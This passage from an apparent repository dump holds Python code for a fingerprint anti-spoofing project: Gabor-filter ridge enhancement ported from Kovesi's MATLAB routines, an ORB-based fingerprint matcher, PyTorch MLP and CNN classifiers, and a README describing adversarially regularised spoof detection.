for both kx and ky is a good starting point.\n# showfilter - An optional flag 0/1. When set an image of the\n# largest scale filter is displayed for inspection.\n# \n# Returns:\n# newim - The enhanced image\n#\n# See also: RIDGEORIENT, RIDGEFREQ, RIDGESEGMENT\n\n# Reference: \n# Hong, L., Wan, Y., and Jain, A. K. Fingerprint image enhancement:\n# Algorithm and performance evaluation. IEEE Transactions on Pattern\n# Analysis and Machine Intelligence 20, 8 (1998), 777 789.\n\n### REFERENCES\n\n# Peter Kovesi \n# School of Computer Science & Software Engineering\n# The University of Western Australia\n# pk at csse uwa edu au\n# http://www.csse.uwa.edu.au/~pk\n\n\n\nimport numpy as np\nimport scipy;\ndef ridge_filter(im, orient, freq, kx, ky):\n angleInc = 3;\n im = np.double(im);\n rows,cols = im.shape;\n newim = np.zeros((rows,cols));\n \n freq_1d = np.reshape(freq,(1,rows*cols));\n ind = np.where(freq_1d>0);\n \n ind = np.array(ind);\n ind = ind[1,:]; \n \n # Round the array of frequencies to the nearest 0.01 to reduce the\n # number of distinct frequencies we have to deal with. \n \n non_zero_elems_in_freq = freq_1d[0][ind]; \n non_zero_elems_in_freq = np.double(np.round((non_zero_elems_in_freq*100)))/100;\n \n unfreq = np.unique(non_zero_elems_in_freq);\n\n # Generate filters corresponding to these distinct frequencies and\n # orientations in 'angleInc' increments.\n \n sigmax = 1/unfreq[0]*kx;\n sigmay = 1/unfreq[0]*ky;\n \n sze = np.round(3*np.max([sigmax,sigmay]));\n \n x,y = np.meshgrid(np.linspace(-sze,sze,(2*sze + 1)),np.linspace(-sze,sze,(2*sze + 1)));\n \n reffilter = np.exp(-(( (np.power(x,2))/(sigmax*sigmax) + (np.power(y,2))/(sigmay*sigmay)))) * np.cos(2*np.pi*unfreq[0]*x); # this is the original gabor filter\n \n filt_rows, filt_cols = reffilter.shape; \n \n gabor_filter = np.array(np.zeros((int(180/angleInc),int(filt_rows),int(filt_cols))));\n \n for o in range(0,int(180/angleInc)):\n \n # Generate rotated versions of the filter. Note orientation\n # image provides orientation *along* the ridges, hence +90\n # degrees, and imrotate requires angles +ve anticlockwise, hence\n # the minus sign. \n \n rot_filt = scipy.ndimage.rotate(reffilter,-(o*angleInc + 90),reshape = False);\n gabor_filter[o] = rot_filt;\n \n # Find indices of matrix points greater than maxsze from the image\n # boundary\n \n maxsze = int(sze); \n\n temp = freq>0; \n validr,validc = np.where(temp) \n \n temp1 = validr>maxsze;\n temp2 = validr<rows - maxsze;\n temp3 = validc>maxsze;\n temp4 = validc<cols - maxsze;\n \n final_temp = temp1 & temp2 & temp3 & temp4; \n \n finalind = np.where(final_temp);\n \n # Convert orientation matrix values from radians to an index value\n # that corresponds to round(degrees/angleInc) \n \n maxorientindex = np.round(180/angleInc);\n orientindex = np.round(orient/np.pi*180/angleInc);\n \n #do the filtering \n \n for i in range(0,rows):\n for j in range(0,cols):\n if(orientindex[i][j] < 1):\n orientindex[i][j] = orientindex[i][j] + maxorientindex;\n if(orientindex[i][j] > maxorientindex):\n orientindex[i][j] = orientindex[i][j] - maxorientindex;\n finalind_rows,finalind_cols = np.shape(finalind);\n sze = int(sze);\n for k in range(0,finalind_cols):\n r = validr[finalind[0][k]];\n c = validc[finalind[0][k]];\n \n img_block = im[r-sze:r+sze + 1][:,c-sze:c+sze + 1];\n \n newim[r][c] = np.sum(img_block * gabor_filter[int(orientindex[r][c]) - 1]);\n \n return(newim); \n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 19 12:14:49 2016\n\n@author: utkarsh\n\"\"\"\n\n\n# RIDGEFREQ - Calculates a ridge frequency image\n#\n# Function to estimate the fingerprint ridge frequency across a\n# fingerprint image. This is done by considering blocks of the image and\n# determining a ridgecount within each block by a call to FREQEST.\n#\n# Usage:\n# [freqim, medianfreq] = ridgefreq(im, mask, orientim, blksze, windsze, ...\n# minWaveLength, maxWaveLength)\n#\n# Arguments:\n# im - Image to be processed.\n# mask - Mask defining ridge regions (obtained from RIDGESEGMENT)\n# orientim - Ridge orientation image (obtained from RIDGORIENT)\n# blksze - Size of image block to use (say 32) \n# windsze - Window length used to identify peaks. This should be\n# an odd integer, say 3 or 5.\n# minWaveLength, maxWaveLength - Minimum and maximum ridge\n# wavelengths, in pixels, considered acceptable.\n# \n# Returns:\n# freqim - An image the same size as im with values set to\n# the estimated ridge spatial frequency within each\n# image block. If a ridge frequency cannot be\n# found within a block, or cannot be found within the\n# limits set by min and max Wavlength freqim is set\n# to zeros within that block.\n# medianfreq - Median frequency value evaluated over all the\n# valid regions of the image.\n#\n# Suggested parameters for a 500dpi fingerprint image\n# [freqim, medianfreq] = ridgefreq(im,orientim, 32, 5, 5, 15);\n#\n\n# See also: RIDGEORIENT, FREQEST, RIDGESEGMENT\n\n# Reference: \n# Hong, L., Wan, Y., and Jain, A. K. Fingerprint image enhancement:\n# Algorithm and performance evaluation. IEEE Transactions on Pattern\n# Analysis and Machine Intelligence 20, 8 (1998), 777 789.\n\n### REFERENCES\n\n# Peter Kovesi \n# School of Computer Science & Software Engineering\n# The University of Western Australia\n# pk at csse uwa edu au\n# http://www.csse.uwa.edu.au/~pk\n\n\n\nimport numpy as np\n#import math\n#import scipy.ndimage\n\ndef ridge_freq(im, mask, orient, blksze, windsze,minWaveLength, maxWaveLength):\n rows,cols = im.shape;\n freq = np.zeros((rows,cols));\n \n for r in range(0,rows-blksze,blksze):\n for c in range(0,cols-blksze,blksze):\n blkim = im[r:r+blksze][:,c:c+blksze];\n blkor = orient[r:r+blksze][:,c:c+blksze];\n \n \n freq[r:r+blksze][:,c:c+blksze] = frequest(blkim,blkor,windsze,minWaveLength,maxWaveLength);\n \n freq = freq*mask;\n freq_1d = np.reshape(freq,(1,rows*cols));\n ind = np.where(freq_1d>0);\n \n ind = np.array(ind);\n ind = ind[1,:]; \n \n non_zero_elems_in_freq = freq_1d[0][ind]; \n \n meanfreq = np.mean(non_zero_elems_in_freq);\n medianfreq = np.median(non_zero_elems_in_freq); # does not work properly\n return(freq,meanfreq)\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 22 03:02:23 2016\n\n@author: utkarsh\n\"\"\"\n\nimport numpy as np\n#import math\n#import scipy.ndimage\n\ndef rifdge_freq(im, mask, orient, blksze, windsze,minWaveLength, maxWaveLength):\n rows,cols = im.shape;\n freq = np.zeros((rows,cols));\n \n for r in range(0,rows-blksze,blksze):\n for c in range(0,cols-blksze,blksze):\n blkim = im[r:r+blksze][:,c:c+blksze];\n blkor = orient[r:r+blksze][:,c:c+blksze];\n \n \n freq[r:r+blksze][:,c:c+blksze] = frequest(blkim,blkor,windsze,minWaveLength,maxWaveLength);\n \n freq = freq*mask;\n freq_1d = np.reshape(freq,(1,rows*cols));\n ind = np.where(freq_1d>0);\n \n ind = np.array(ind);\n ind = ind[1,:]; \n \n non_zero_elems_in_freq = freq_1d[0][ind]; \n \n medianfreq = np.median(non_zero_elems_in_freq);\n \n return(medianfreq)\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 19 11:31:54 2016\n\n@author: utkarsh\n\"\"\"\n\n\n\n# RIDGEORIENT - Estimates the local orientation of ridges in a fingerprint\n#\n# Usage: [orientim, reliability, coherence] = ridgeorientation(im, gradientsigma,...\n# blocksigma, ...\n# orientsmoothsigma)\n#\n# Arguments: im - A normalised input image.\n# gradientsigma - Sigma of the derivative of Gaussian\n# used to compute image gradients.\n# blocksigma - Sigma of the Gaussian weighting used to\n# sum the gradient moments.\n# orientsmoothsigma - Sigma of the Gaussian used to smooth\n# the final orientation vector field. \n# Optional: if ommitted it defaults to 0\n# \n# Returns: orientim - The orientation image in radians.\n# Orientation values are +ve clockwise\n# and give the direction *along* the\n# ridges.\n# reliability - Measure of the reliability of the\n# orientation measure. This is a value\n# between 0 and 1. I think a value above\n# about 0.5 can be considered 'reliable'.\n# reliability = 1 - Imin./(Imax+.001);\n# coherence - A measure of the degree to which the local\n# area is oriented.\n# coherence = ((Imax-Imin)./(Imax+Imin)).^2;\n#\n# With a fingerprint image at a 'standard' resolution of 500dpi suggested\n# parameter values might be:\n#\n# [orientim, reliability] = ridgeorient(im, 1, 3, 3);\n#\n# See also: RIDGESEGMENT, RIDGEFREQ, RIDGEFILTER\n\n### REFERENCES\n\n# May 2003 Original version by Raymond Thai, \n# January 2005 Reworked by Peter Kovesi \n# October 2011 Added coherence computation and orientsmoothsigma made optional\n#\n# School of Computer Science & Software Engineering\n# The University of Western Australia\n# pk at csse uwa edu au\n# http://www.csse.uwa.edu.au/~pk\n\n\nimport numpy as np;\nimport cv2;\nfrom scipy import ndimage;\nfrom scipy import signal\n\ndef ridge_orient(im, gradientsigma, blocksigma, orientsmoothsigma):\n rows,cols = im.shape;\n #Calculate image gradients.\n sze = np.fix(6*gradientsigma);\n if np.remainder(sze,2) == 0:\n sze = sze+1;\n \n gauss = cv2.getGaussianKernel(np.int(sze),gradientsigma);\n f = gauss * gauss.T;\n \n fy,fx = np.gradient(f); #Gradient of Gaussian\n \n #Gx = ndimage.convolve(np.double(im),fx);\n #Gy = ndimage.convolve(np.double(im),fy);\n \n Gx = signal.convolve2d(im,fx,mode='same'); \n Gy = signal.convolve2d(im,fy,mode='same');\n \n Gxx = np.power(Gx,2);\n Gyy = np.power(Gy,2);\n Gxy = Gx*Gy;\n \n #Now smooth the covariance data to perform a weighted summation of the data. \n \n sze = np.fix(6*blocksigma);\n \n gauss = cv2.getGaussianKernel(np.int(sze),blocksigma);\n f = gauss * gauss.T;\n \n Gxx = ndimage.convolve(Gxx,f);\n Gyy = ndimage.convolve(Gyy,f);\n Gxy = 2*ndimage.convolve(Gxy,f);\n \n # Analytic solution of principal direction\n denom = np.sqrt(np.power(Gxy,2) + np.power((Gxx - Gyy),2)) + np.finfo(float).eps;\n \n sin2theta = Gxy/denom; # Sine and cosine of doubled angles\n cos2theta = (Gxx-Gyy)/denom;\n \n \n if orientsmoothsigma:\n sze = np.fix(6*orientsmoothsigma);\n if np.remainder(sze,2) == 0:\n sze = sze+1; \n gauss = cv2.getGaussianKernel(np.int(sze),orientsmoothsigma);\n f = gauss * gauss.T;\n cos2theta = ndimage.convolve(cos2theta,f); # Smoothed sine and cosine of\n sin2theta = ndimage.convolve(sin2theta,f); # doubled angles\n \n orientim = np.pi/2 + np.arctan2(sin2theta,cos2theta)/2;\n return(orientim);\n\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 18 23:04:30 2016\n\n@author: utkarsh\n\"\"\"\n\n\n\n# RIDGESEGMENT - Normalises fingerprint image and segments ridge region\n#\n# Function identifies ridge regions of a fingerprint image and returns a\n# mask identifying this region. It also normalises the intesity values of\n# the image so that the ridge regions have zero mean, unit standard\n# deviation.\n#\n# This function breaks the image up into blocks of size blksze x blksze and\n# evaluates the standard deviation in each region. If the standard\n# deviation is above the threshold it is deemed part of the fingerprint.\n# Note that the image is normalised to have zero mean, unit standard\n# deviation prior to performing this process so that the threshold you\n# specify is relative to a unit standard deviation.\n#\n# Usage: [normim, mask, maskind] = ridgesegment(im, blksze, thresh)\n#\n# Arguments: im - Fingerprint image to be segmented.\n# blksze - Block size over which the the standard\n# deviation is determined (try a value of 16).\n# thresh - Threshold of standard deviation to decide if a\n# block is a ridge region (Try a value 0.1 - 0.2)\n#\n# Returns: normim - Image where the ridge regions are renormalised to\n# have zero mean, unit standard deviation.\n# mask - Mask indicating ridge-like regions of the image, \n# 0 for non ridge regions, 1 for ridge regions.\n# maskind - Vector of indices of locations within the mask. \n#\n# Suggested values for a 500dpi fingerprint image:\n#\n# [normim, mask, maskind] = ridgesegment(im, 16, 0.1)\n#\n# See also: RIDGEORIENT, RIDGEFREQ, RIDGEFILTER\n\n### REFERENCES\n\n# Peter Kovesi \n# School of Computer Science & Software Engineering\n# The University of Western Australia\n# pk at csse uwa edu au\n# http://www.csse.uwa.edu.au/~pk\n\n\nimport numpy as np\n\ndef normalise(img,mean,std):\n normed = (img - np.mean(img))/(np.std(img)); \n return(normed)\n \ndef ridge_segment(im,blksze,thresh):\n \n rows,cols = im.shape; \n \n im = normalise(im,0,1); # normalise to get zero mean and unit standard deviation\n \n \n new_rows = np.int(blksze * np.ceil((np.float(rows))/(np.float(blksze))))\n new_cols = np.int(blksze * np.ceil((np.float(cols))/(np.float(blksze))))\n \n padded_img = np.zeros((new_rows,new_cols));\n stddevim = np.zeros((new_rows,new_cols));\n \n padded_img[0:rows][:,0:cols] = im;\n \n for i in range(0,new_rows,blksze):\n for j in range(0,new_cols,blksze):\n block = padded_img[i:i+blksze][:,j:j+blksze];\n \n stddevim[i:i+blksze][:,j:j+blksze] = np.std(block)*np.ones(block.shape)\n \n stddevim = stddevim[0:rows][:,0:cols]\n \n mask = stddevim > thresh;\n \n mean_val = np.mean(im[mask]);\n \n std_val = np.std(im[mask]);\n \n normim = (im - mean_val)/(std_val);\n \n return(normim,mask)\n\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 18 22:50:30 2016\n\n@author: utkarsh\n\"\"\"\n\ndef image_enhance(img):\n blksze = 16;\n thresh = 0.1;\n normim,mask = ridge_segment(img,blksze,thresh); # normalise the image and find a ROI\n\n\n gradientsigma = 1;\n blocksigma = 7;\n orientsmoothsigma = 7;\n orientim = ridge_orient(normim, gradientsigma, blocksigma, orientsmoothsigma); # find orientation of every pixel\n\n\n blksze = 38;\n windsze = 5;\n minWaveLength = 5;\n maxWaveLength = 15;\n freq,medfreq = ridge_freq(normim, mask, orientim, blksze, windsze, minWaveLength,maxWaveLength); #find the overall frequency of ridges\n \n \n freq = medfreq*mask;\n kx = 0.65;ky = 0.65;\n newim = ridge_filter(normim, orientim, freq, kx, ky); # create gabor filter and do the actual filtering\n \n \n #th, bin_im = cv2.threshold(np.uint8(newim),0,255,cv2.THRESH_BINARY);\n return(newim < -3)\n\nimport cv2\nimport os\nimport sys\nimport numpy\nimport matplotlib.pyplot as plt\nfrom skimage.morphology import skeletonize, thin\nimport math\n\ndef removedot(invertThin):\n temp0 = numpy.array(invertThin[:])\n temp0 = numpy.array(temp0)\n temp1 = temp0/255\n temp2 = numpy.array(temp1)\n temp3 = numpy.array(temp2)\n\n enhanced_img = numpy.array(temp0)\n filter0 = numpy.zeros((10,10))\n W,H = temp0.shape[:2]\n filtersize = 6\n\n for i in range(W - filtersize):\n for j in range(H - filtersize):\n filter0 = temp1[i:i + filtersize,j:j + filtersize]\n\n flag = 0\n if sum(filter0[:,0]) == 0:\n flag +=1\n if sum(filter0[:,filtersize - 1]) == 0:\n flag +=1\n if sum(filter0[0,:]) == 0:\n flag +=1\n if sum(filter0[filtersize - 1,:]) == 0:\n flag +=1\n if flag > 3:\n temp2[i:i + filtersize, j:j + filtersize] = numpy.zeros((filtersize, filtersize))\n\n return temp2\n\n\ndef get_descriptors(img):\n\tclahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8,8))\n\timg = clahe.apply(img)\n\timg = image_enhance(img)\n\timg = numpy.array(img, dtype=numpy.uint8)\n\t# Threshold\n\tret, img = cv2.threshold(img, 127, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)\n\t# Normalize to 0 and 1 range\n\timg[img == 255] = 1\n\n\t#Thinning\n\tskeleton = skeletonize(img)\n\tskeleton = numpy.array(skeleton, dtype=numpy.uint8)\n\tskeleton = removedot(skeleton)\n\t# Harris corners\n\tharris_corners = cv2.cornerHarris(img, 3, 3, 0.04)\n\tharris_normalized = cv2.normalize(harris_corners, 0, 255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_32FC1)\n\tthreshold_harris = 125\n\t# Extract keypoints\n\tkeypoints = []\n\tfor x in range(0, harris_normalized.shape[0]):\n\t\tfor y in range(0, harris_normalized.shape[1]):\n\t\t\tif harris_normalized[x][y] > threshold_harris:\n\t\t\t\tkeypoints.append(cv2.KeyPoint(y, x, 1))\n\t# Define descriptor\n\torb = cv2.ORB_create()\n\t# Compute descriptors\n\t_, des = orb.compute(img, keypoints)\n\treturn (keypoints, des);\n\n\ndef match_imgs(img1, img2):\n\n #img1 and img2 are np.arrays\n\n kp1, des1 = get_descriptors(img1)\n kp2, des2 = get_descriptors(img2)\n \n # Matching between descriptors\n bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n matches = sorted(bf.match(des1, des2), key= lambda match:match.distance)\n \n # Calculate score\n score = 0;\n for match in matches:\n score += match.distance\n score_threshold = 33*0.1\n score = score/len(matches)\n score = score*0.1\n\n return score\n\ndef MATCHER(original_batch, modified_batch):\n\n original_batch_ = original_batch.detach().cpu().numpy().copy()\n modified_batch_ = modified_batch.detach().cpu().numpy().copy()\n\n batch_size = original_batch_.shape[0]\n\n score = 0\n for i in range(batch_size):\n\n original_image = original_batch_[i][0]\n modified_image = modified_batch_[i][0]\n\n original_image = cv2.normalize(original_image, None, alpha = 0, beta = 255, norm_type = cv2.NORM_MINMAX, dtype = cv2.CV_32F)\n modified_image = cv2.normalize(modified_image, None, alpha = 0, beta = 255, norm_type = cv2.NORM_MINMAX, dtype = cv2.CV_32F)\n\n original_image = np.uint8(original_image)\n modified_image = np.uint8(modified_image)\n\n score += match_imgs(original_image, modified_image)\n\n score = score/batch_size\n\n return score\n" }, { "alpha_fraction": 0.56605064868927, "alphanum_fraction": 0.5749486684799194, "avg_line_length": 24.63157844543457, "blob_id": "e4e38818aed31ca3e5434614d6205fd52689db88", "content_id": "36582f3695fa6fa4c6f2c680384d465d24e31660", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1461, "license_type": "no_license", "max_line_length": 77, "num_lines": 57, "path": "/MLP/layers/mlp_layers.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "'''\nBASED ON ANA FILIPA SEQUEIRA'S PREVIOUS WORK\n'''\n\nimport torch\nimport torch.nn as nn\nfrom torch import Tensor\n\n__negative_slope__ = 0.01\n\n\ndef get_activation_layer(activation):\n ''' Create activation layer '''\n if activation == 'relu':\n return nn.ReLU()\n elif activation == 'leaky_relu':\n return nn.LeakyReLU(__negative_slope__)\n elif activation == 'tanh':\n return nn.Tanh()\n else:\n errmsg = 'Invalid activation'\n raise Exception(errmsg)\n\ndef BasicDenseLayer(in_features,\n out_features,\n bnorm=True,\n activation='linear',\n dropout=0.0):\n ''' Create a composed dense layer\n (Linear - bnorm - activation - dropout) '''\n # ModuleList of layers (Linear - bnorm - activation - dropout)\n layers = nn.ModuleList([\n nn.Linear(in_features, out_features)\n ])\n\n if bnorm:\n layers.extend([nn.BatchNorm1d(out_features)]) # bnorm layer\n\n if activation != 'linear':\n layers.extend([get_activation_layer(activation)]) # activation layer\n\n if dropout > 0.0:\n layers.extend([nn.Dropout(dropout)])\n\n # Convert to Sequential\n BasicDense = nn.Sequential(*(layers))\n\n return BasicDense\n\n\nif __name__ == '__main__':\n\n a = BasicDenseLayer(in_features=32,\n out_features=128,\n bnorm=True,\n activation='relu')\n print(a)\n" }, { "alpha_fraction": 0.8365758657455444, "alphanum_fraction": 0.8365758657455444, "avg_line_length": 41.83333206176758, "blob_id": "df54b51b06e05fc175c412310bc648c8be6a0d43", "content_id": "7b979a6c7e4bd919b33121c6426e04bb012dd166", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 257, "license_type": "no_license", "max_line_length": 72, "num_lines": 6, "path": "/README.md", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "# Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning\nFingerprint Antispoofing/PAD (forgery detection) with deep learning.\n\nCNNreg - CNN regularized with adversarial training and transfer learning\n\nII-GAN - GAN that modify fake fingerprints\n" }, { "alpha_fraction": 0.4578854441642761, "alphanum_fraction": 0.47328734397888184, "avg_line_length": 28.540285110473633, "blob_id": "7c96c2d60d637b9d423c6c46aa5eaf0393c31901", "content_id": "6852f376c1e16d309f69b9ed642a2733d3a9ce48", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6233, "license_type": "no_license", "max_line_length": 74, "num_lines": 211, "path": "/CNNreg/models/cnn_reg.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "import math\nimport sys\n\nsys.path.insert(0, '../data/')\nsys.path.insert(0, '../layers/')\nsys.path.insert(0, '../utils/')\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom sklearn.model_selection import ShuffleSplit\nfrom torch import Tensor\nfrom torch.nn import functional as F\n\nfrom cnn2_layers import BasicConvLayer, BasicDenseLayer\n\nN_CLASSES = 2 \nCHANNELS = 1 \n\nCONV_FILTERS = [64, 64, 128, 128, 256, 256, 256, 256]\n\nN_CONV = len(CONV_FILTERS)\n\n\nMAX_POOL = [False, True, False, True, False, False, False, True]\n\nK_SIZES = [3]*N_CONV\nSTRIDES = [1]*N_CONV\nPADDINGS = [1]*N_CONV\n\nTASK_DIMS = [4096, 4096, 1000, 2]\nADV_DIMS = [4096, 4096, 1000, 3]\n\nDROPOUT = .5\nBATCH_NORM = True\n\nN_CONV = len(CONV_FILTERS)\nN_FC = len(TASK_DIMS)\n\nclass CNN_REG(nn.Module):\n def __init__(self,\n activation='relu',\n bnorm=False,\n dropout=0.0):\n\n super(CNN_REG, self).__init__()\n\n self.activation = activation\n self.bnorm = bnorm\n self.dropout = dropout\n\n # Initialize conv layers\n self.create_conv_layers()\n \n self.avgpool = nn.AdaptiveAvgPool2d((7, 7))\n \n # Initialize fc layers\n self.create_task_classifier()\n self.create_adv_classifier()\n\n\n\n def create_conv_layers(self):\n # first conv layer\n conv_list = nn.ModuleList([\n BasicConvLayer(in_channels=CHANNELS,\n out_channels=CONV_FILTERS[0],\n kernel_size=K_SIZES[0],\n stride=STRIDES[0],\n bnorm=True,\n activation=self.activation,\n max_pool=MAX_POOL[0])\n ])\n\n # remaining conv layers\n conv_list.extend([BasicConvLayer(in_channels=CONV_FILTERS[l-1],\n out_channels=CONV_FILTERS[l],\n kernel_size=K_SIZES[l],\n stride=STRIDES[l],\n bnorm=True,\n activation=self.activation,\n max_pool=MAX_POOL[l])\n for l in range(1, N_CONV)])\n\n\n self.feature_extractor = nn.Sequential(*conv_list)\n\n def create_task_classifier(self):\n \n # first dense layer\n dense_list = nn.ModuleList([\n BasicDenseLayer(in_features=CONV_FILTERS[-1] * 7 * 7,\n out_features=TASK_DIMS[0],\n bnorm=self.bnorm,\n activation=self.activation,\n dropout=self.dropout)\n ])\n\n # remaining dense layers\n dense_list.extend([BasicDenseLayer(in_features=TASK_DIMS[l-1],\n out_features=TASK_DIMS[l],\n bnorm=self.bnorm,\n activation=self.activation,\n dropout=self.dropout)\n for l in range(1, N_FC-1)])\n\n # Last dense layer\n dense_list.append(BasicDenseLayer(in_features=TASK_DIMS[-2],\n out_features=TASK_DIMS[-1],\n bnorm=self.bnorm,\n activation='linear'))\n\n self.task_classifier = nn.Sequential(*dense_list)\n\n def create_adv_classifier(self):\n \n # first dense layer\n dense_list = nn.ModuleList([\n BasicDenseLayer(in_features=CONV_FILTERS[-1] * 7 * 7,\n out_features=ADV_DIMS[0],\n bnorm=self.bnorm,\n activation=self.activation,\n dropout=self.dropout)\n ])\n\n # remaining dense layers\n dense_list.extend([BasicDenseLayer(in_features=ADV_DIMS[l-1],\n out_features=ADV_DIMS[l],\n bnorm=self.bnorm,\n activation=self.activation,\n dropout=self.dropout)\n for l in range(1, N_FC-1)])\n\n # Last dense layer\n dense_list.append(BasicDenseLayer(in_features=ADV_DIMS[-2],\n out_features=ADV_DIMS[-1],\n bnorm=self.bnorm,\n activation='linear'))\n\n self.adv_classifier = nn.Sequential(*dense_list)\n\n def forward(self, x, x_fake):\n\n #TASK CLASSIFIER\n conv_list = ()\n for layer in range(N_CONV):\n x = self.feature_extractor[layer](x)\n conv_list += x,\n \n x = conv_list[-1]\n \n h_avgpool = self.avgpool(x)\n \n x = h_avgpool\n x = x.view(x.size(0), -1)\n \n h_task = () \n for layer in range(N_FC):\n x = self.task_classifier[layer](x)\n h_task += x, \n\n #ADV CLASSIFIER\n conv_list_fake = ()\n for layer in range(N_CONV):\n x_fake = self.feature_extractor[layer](x_fake)\n conv_list_fake += x_fake,\n \n x = conv_list_fake[-1]\n \n h_avgpool = self.avgpool(x)\n \n x = h_avgpool\n x = x.view(x.size(0), -1)\n \n h_adv = () \n for layer in range(N_FC):\n x = self.adv_classifier[layer](x)\n h_adv += x, \n \n return (conv_list, h_task, conv_list_fake, h_adv)\n \n def predict(self, x, x_fake):\n \n #probabilities of each class\n conv_list, h_task, conv_list_fake, h_adv = self.forward(x, x_fake)\n probs = F.softmax(h_task[-1], dim=1)\n \n return probs\n\n\nif __name__ == '__main__':\n \n import os\n os.getcwd()\n os.chdir(\"../\")\n os.getcwd()\n print(os.getcwd())\n\n print()\n if torch.cuda.is_available():\n DEVICE = torch.device(\"cuda:0\") \n print(\"Running on the GPU...\")\n else:\n DEVICE = torch.device(\"cpu\")\n print(\"Running on the CPU...\")\n print()\n \n\n model = CNN_REG().to(DEVICE)\n\n print(model)\n" }, { "alpha_fraction": 0.5064935088157654, "alphanum_fraction": 0.515460729598999, "avg_line_length": 28.94444465637207, "blob_id": "71ae5f709b35512154d9c6811712bda3690c1eb7", "content_id": "cc7dc065ef9aae331c9d9bcc9f12d0103df307e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3234, "license_type": "no_license", "max_line_length": 102, "num_lines": 108, "path": "/MLP/models/mlp_fpad.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "'''\nBASED ON ANA FILIPA SEQUEIRA'S PREVIOUS WORK\n'''\n\nimport math\nimport sys\n\nsys.path.insert(0, '../data/')\nsys.path.insert(0, '../layers/')\nsys.path.insert(0, '../utils/')\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom sklearn.model_selection import ShuffleSplit\nfrom torch import Tensor\nfrom torch.nn import functional as F\n\nfrom mlp_layers import BasicDenseLayer\n\nclass MLP_FPAD(nn.Module):\n def __init__(self,\n input_dims=275,\n dense_dims=[128, 128, 2],\n activation='relu',\n bnorm=False,\n dropout=0.0,\n is_classifier=True):\n\n super(MLP_FPAD, self).__init__()\n\n self.input_dims = input_dims\n self.dense_dims = dense_dims\n self.activation = activation\n self.bnorm = bnorm\n self.dropout = dropout\n self.n_layers = len(self.dense_dims)\n self.is_classifier = is_classifier\n if self.is_classifier:\n self.n_layers = self.n_layers - 1\n\n # Initialize encoder layers\n self.create_dense_layers()\n\n def create_dense_layers(self):\n # first dense layer\n dense_list = nn.ModuleList([\n BasicDenseLayer(in_features=self.input_dims,\n out_features=self.dense_dims[0],\n bnorm=self.bnorm,\n activation=self.activation,\n dropout=self.dropout)\n ])\n\n # remaining dense layers\n dense_list.extend([BasicDenseLayer(in_features=self.dense_dims[l-1],\n out_features=self.dense_dims[l],\n bnorm=self.bnorm,\n activation=self.activation,\n dropout=self.dropout)\n for l in range(1, self.n_layers)])\n\n # Last dense layer\n if self.is_classifier:\n dense_list.append(BasicDenseLayer(in_features=self.dense_dims[-2],\n out_features=self.dense_dims[-1],\n bnorm=self.bnorm,\n activation='linear'))\n\n self.denseBlock = nn.Sequential(*dense_list)\n\n def forward(self, x):\n # get the activations of each layer\n h_list = ()\n for layer in range(len(self.dense_dims)):\n x = self.denseBlock[layer](x)\n h_list += x,\n return h_list\n \n def predict(self, x):\n #probabilities of each class\n h_list = self.forward(x)\n probs = F.softmax(h_list[-1], dim=1)\n \n return probs\n\n\nif __name__ == '__main__':\n \n import os\n os.getcwd()\n os.chdir(\"../\")\n os.getcwd()\n print(os.getcwd())\n\n print()\n if torch.cuda.is_available():\n DEVICE = torch.device(\"cuda:0\") # you can continue going on here, like cuda:1 cuda:2....etc. \n print(\"Running on the GPU...\")\n else:\n DEVICE = torch.device(\"cpu\")\n print(\"Running on the CPU...\")\n print()\n \n input_dims = 275\n model = MLP_FPAD(input_dims=input_dims).to(DEVICE)\n\n print(model)\n" }, { "alpha_fraction": 0.6296296119689941, "alphanum_fraction": 0.6296296119689941, "avg_line_length": 24.47058868408203, "blob_id": "97fcf36c1f4e4143638f934077211a4d9b7ad9ba", "content_id": "c17b01977ab315faeed0633431e9ea9bf3eee6e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 432, "license_type": "no_license", "max_line_length": 111, "num_lines": 17, "path": "/CNNreg/utils/cnn2_utils.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "import numpy as np\n\ndef _nanargmin(arr): #return nan if there is no result of the np.nanargmin function\n try:\n return np.nanargmin(arr)\n except ValueError:\n return np.nan\n \ndef frange(start, stop, step): #creates list between start, top and with a defined step (for non integer steps)\n\n num = start\n _list = []\n while num <= stop:\n _list.append(num)\n num = num + step\n \n return _list" }, { "alpha_fraction": 0.4758661985397339, "alphanum_fraction": 0.4915063977241516, "avg_line_length": 41.761600494384766, "blob_id": "cfee7f6e4d9a50a3ad932d559f89f1e50471b151", "content_id": "4da859389707376714d6a0913045f1d3b3bc8a2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 26726, "license_type": "no_license", "max_line_length": 465, "num_lines": 625, "path": "/CNNreg/run_reg.py", "repo_name": 